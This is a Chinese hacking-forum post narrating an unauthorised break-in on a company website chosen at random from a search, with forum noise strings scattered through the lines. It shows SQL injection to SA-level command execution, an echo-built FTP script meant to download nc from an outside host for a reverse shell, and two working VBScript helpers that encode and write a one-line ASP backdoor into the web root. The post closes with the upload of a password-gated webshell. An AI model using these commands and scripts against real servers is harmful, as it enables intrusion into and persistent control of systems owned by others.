|
作者:haicao [E.S.T]* R9 D* Q5 z9 {; f% E
. `. s. [+ J9 _1 ]: A& ]
今天在网上看到一个动画,动画里说那些大公司的安全做的怎么怎么差,所以我便决定找个看看,在GOOGLE随便输入了"集团",搜索到的第一页随便点击就进了一家公司的网站。随便点了一个连接加了一个单引号
: i$ ~" C! H4 v1 V7 thttp://www.xxx.com.cn/gushi.asp?pid=8&cid=111' 9 S; l o- r- [' V u' w
晕,返回错误:
2 k* ^3 q% O# ^Microsoft VBScript 编译器错误 错误 '800a03f6' ! |$ I# q x$ T9 R, n
! l7 R7 ^+ \6 h' \! g缺少 'End' ! H. h1 I& g1 `( d0 U
, E" _7 u8 A! `7 v' s/iisHelp/common/500-100.asp,行242
5 c8 [' d& H _
8 r1 R1 h& I" uMicrosoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
7 i, D* X, ?9 M+ X
( e5 e7 |8 T" Y: ^2 W$ q[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。 % E$ t: H4 _! p! n, i
: X; V y6 P* Z) \0 _
/inc/artid.inc,行8 9 B, d9 B! o! K6 ?: P) W
返回的信息说明是SQL Server
+ D* x* e( N& d7 j+ aping www.xxx.com.cn后返回IP:61.XX.XX.68通过IP可以直接访问这个网站,说明是独立的服务器。" j1 _* l* _. `0 I0 z2 N$ q! a2 ?
我一下来了兴致看来是家有钱的大公司,用NBSI检测了下这个连接,竟然是SA权限的!8 x, m1 e6 G- t# k( L5 }+ p
/ ~& z8 c; Q9 E
& j* I/ b4 y4 w0 O1 Q我用SUPERSCAN扫描了这台主机的开放端口只开放了80及8080端口(都是提供web服务,看来是装了_blank">防火墙,意料之中)。这样的话直接添加用户开3389什么都失去了意义了。只好重新理清头绪。0 g# s; ^9 J1 V+ m4 g7 O& ?1 P) L9 Q
首先想到的是用ECHO写一个ftp.txt文件然后执行ftp -s:ftp.txt来下载一个nc在NBSI里执行命令反向连接过来就可以得到它的系统权限了,但在用ECHO写文件时又出了问题了,我输入一条ECHO命令竟然执行了四次。如图我输入命令 echo open ftp.eviloctal.com>>e:\xxxweb\app\3.txt(e:\xxxweb为网站根目录)竟然往文件里写入了四次这样的话直接用ftp.txt下载文件肯定没戏。# d2 P( @/ {2 N+ C. y+ c$ z3 O
& P0 n, n9 U. V3 e% \' N
0 R$ [8 t b; l# y l2 r
X0 r5 s, o7 l# v(特别提示:用NBSI执行命令的时侯最好不要勾选尝试返回结果,因为执行命令会很慢很慢,而用重定向符">>"把命令的执行结果重定向输出到web目录比如dir c:\可以写成dir c:\ >> e:\xxxweb\app\1.txt这样速度很快然后通过浏览器查看命令执行结果浏览http://www.xxx.com.cn/app/1.txt e:\xxxweb为网站的根目录)
! b0 ?, M5 A- p3 Y
$ P/ U' s, E( \如果能把那个一句话的后门(服务端:)写到WEB目录就好办了,但是不管怎么ECHO %也被过滤掉了。在本地执行echo ^的文件,但在NBSI里执行时无论如何生成的文件中%被过滤了。内容变成:" G* ]: t& `; s7 c$ \- x
/ v" c8 N* v- d3 i! m, i! X
<execute request("l")>
$ F: p+ q4 Z8 t4 J: j& Q<execute request("l")>
m( o1 o' Y+ e1 W9 Y& L# L5 ~3 j<execute request("l")>
8 U* J% D! X8 ~<execute request("l")> . A: b# C! e$ l8 p9 h4 {9 d
8 ]6 M' X) |* t* S) q
9 A8 _; Q% q5 Z这样的话,就没办法直接写一句话的ASP服务端后门了。(内容为四句原因同上)我想到了先写一个VBS脚本然后把要写的文件内容作为参数传递给VBS脚本去处理生成相应的文件。0 h7 i: S4 P" b. S# B
写文件的脚本writefile.vbs(命令格式为cscript writefile.vbs "要写的字串" 目标文件)内容为:0 X( I4 D% y9 z1 `- R9 [ n
on error resume next:x=1:' E, u0 Y$ }( `7 k" @- D& U
str=replace(Wscript.Arguments(0),"==",vbcrlf): '将==替换回车* W' m) u# p: Q- o' D/ L5 f7 P
str=replace(str,"**",""""): ‘将**替换为符号"5 ^, ?8 h) J" j( p* e
str=replace(str,"--",chr(38)): ‘将--替换为符号 &
9 a, ?+ J& s% B* i3 g5 a$ d% _str=replace(str,"@@",chr(37)): '将@@替换符号%
) z) V6 |8 a! J0 y4 w; }Set fso = CreateObject("Scripting.FileSystemObject"): i4 G. n# m- r. |7 T! p, t* H
Set a = fso.CreateTextFile(Wscript.Arguments(1),true): ‘创建文件,文件名为执行时给出的第二个参数0 B3 L" t/ }) W$ x
if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:
$ X4 J5 j C0 K7 J: p这个文件得用ECHO命令把它写到服务器上xxx.vbe或xxx.vbs,然后用这个VBS写我们要的文件。(上面中因为像",%,&,回车符 是不能直接作为参数传递给脚本文件的,所以还需要对这些字符进行替换。下面的脚本trans.vbs将完成相反的过程)
8 L6 L/ f& f9 ]; k简单解释一下:第一条语句是最重要的,容错语句不管后面的程序出了什么错都继续执行。其次是IF语句,为了避免多条语句重复向文件写入同样的内容用了一个标志若x=1才执行写文件,写完马上把x赋值为2。其次可能你会感到奇怪为什么每条语句后加了:,其实是因为我考虑到如果在同一行有多条相同的语句的时侯可以保证程序还能执行。比如:
% [5 A: f& i5 u3 D astr=replace(Wscript.Arguments(0),"==",vbcrlf):str=replace(Wscript.Arguments(0),"==",vbcrlf):
+ {* C- o- M+ Z9 p& |若写成str=replace(Wscript.Arguments(0),"==",vbcrlf)0 m6 r _. l5 t
则一行显示多条相同语句时变成
5 E9 j1 i) B" b4 p1 f4 ]str=replace(Wscript.Arguments(0),"==",vbcrlf)str=replace(Wscript.Arguments(0),"==",vbcrlf)% l2 |% C6 E+ X9 |- ^
这样程序便不能正常执行了。
0 Q' P% R' r" G& \4 l! {; l; L",%,&,回车符 是不能直接作为参数传递给脚本文件,容易看出用==代替了回车,用**代替了双引号,用--代替了&,用@@代替了%.在执行写文件得先把我们要写的文件比如转换成writefile.vbs可以接受的格式。用下面的脚本转换trans.vbs(命令格式为cscript trans.vbs 源文件 目标文件):
0 p- _ b( {" E* p& }5 u# \5 \on error resume next
! S- W* O- A$ R- y u) Rif Wscript.Arguments.count<>2 then 2 |, U6 p5 K/ {2 T1 i
wscript.echo "参数有误啦 格式为:cscript trans.vbs 源文件 目标文件"
7 S) t% B7 f4 f, S5 b' I' R wscript.quit
; X* l. f% f' Tend if
( h5 [6 Z( k0 H$ |; J. CSet fso=CreateObject("Scripting.FileSystemObject")
% R3 }$ G2 R) I& \Set a=fso.openTextFile(Wscript.Arguments(0))7 g* A# T" ^* Q5 ^2 O
str=a.readall0 K" [6 r6 l- W; M# y# z
str=replace(str,"""","**") '把双引号替换成**9 W# ], M" t+ @% @$ y7 S4 E
str=replace(str,vbcrlf,"==") '把回车替换成==* E3 `0 n% l; T- H. O
str=replace(str,"&","--") '把&号替换成--
y$ J. V# f2 k" _7 Astr=replace(str,"%","@@") '把%替换成@@
9 `" }* G( ~% Q0 Q, N: Rwscript.echo str- o$ K/ w" C2 k( Q! F
Set a=fso.CreateTextFile(Wscript.Arguments(1), True)5 a+ G! K, L% v) s( G7 j, J
a.Write(str)% Q8 m* d6 h" R1 s% t
2 O6 Z( @" g* b- I. V
在本地执行cscript trans.vbs one.txt onetrans.txt7 T, F6 a' ]5 T
其中one.txt为我们的一句话后门内容为:3 s3 c4 l* W$ Z7 ~
转换后内容存在onetrans.txt中内容变成转换后的:<@@execute request(**l**)@@>保存在文件onetrans.txt中。
2 G' S9 O3 t2 Q+ v. Fwritefile.vbs的ECHO代码为:: c1 X; l/ {1 ?" X8 m
echo on error resume next:x=1:>>writefile.vbe d) V) e+ I$ q' |4 x; m7 [" s
echo str=replace(Wscript.Arguments(0),"==",vbcrlf):>>writefile.vbe 7 f N! Z. J: o$ e, r
echo str=replace(str,"**",""""):>>writefile.vbe % A( \: G0 v& U
echo str=replace(str,"--",chr(38)):>>writefile.vbe ' P0 ]" q. B- O
echo str=replace(str,"@@",chr(37)):>>writefile.vbe , F; A2 [8 i* l3 N& B8 J' [ y
echo Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe. l. b0 @( L8 x1 k1 o% S: ~
echo Set a = fso.CreateTextFile(Wscript.Arguments(1),true):>>writefile.vbe
& w) Y. C3 i6 r; S- @& necho if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:>>writefile.vbe
( ^* @6 S! @3 o3 n
0 ~4 K2 B2 a" W8 U* R把上面的命令一句句拿到NBSI的NB Commander 命令执行器上执行一下就在对方的系统目录下写进了一个文件writefile.vbe,接着就可以把一句话的服务器的后门写到对方WEB目录下了!命令为:5 ]+ h2 f' }: i
cscript writefile.vbe "<@@execute request(**l**)@@>" d:\web\app\1.asp (注意当传递给脚本的参数中含空格时一定得用两个双引号括起来!), O. u, D# y& U' w
相应的地址为:http://www.xxx.com.cn/app/1.asp' V3 h0 e' Q* |1 ] E, O$ s
把post.htm的form action指向这个地址我们就可以在本地把我们的木马上传到服务器上了!如图:
. i/ e% }3 C& T( I" l" z+ x/ a9 B) J; u' v+ a3 D
/ q, j) H) j4 t- \6 L执行post.htm在下面的文本框中粘贴一下我们用来保存文件的ASP木马。并点击upload当成功转向EST论坛时说明ASP木马上传成功了!
4 P* e4 j2 R- _/ ^* v$ d
! v- {9 k' g, y) u% G我很顺利的把保存文件的木马上传到了服务器上文件名为advv.asp.如图:
0 J+ v0 X: I4 M1 @+ |5 |+ l* _9 q" Q9 N6 u' f2 o2 y
我把这个木马加了验证所以必须得通过这个url才能顺利访问:
( ~7 M, g- p) P) y( Hhttp://www.xxx.com.cn/app/advv.asp?id=haicao (当未加参数id=haicao时显示空页面) |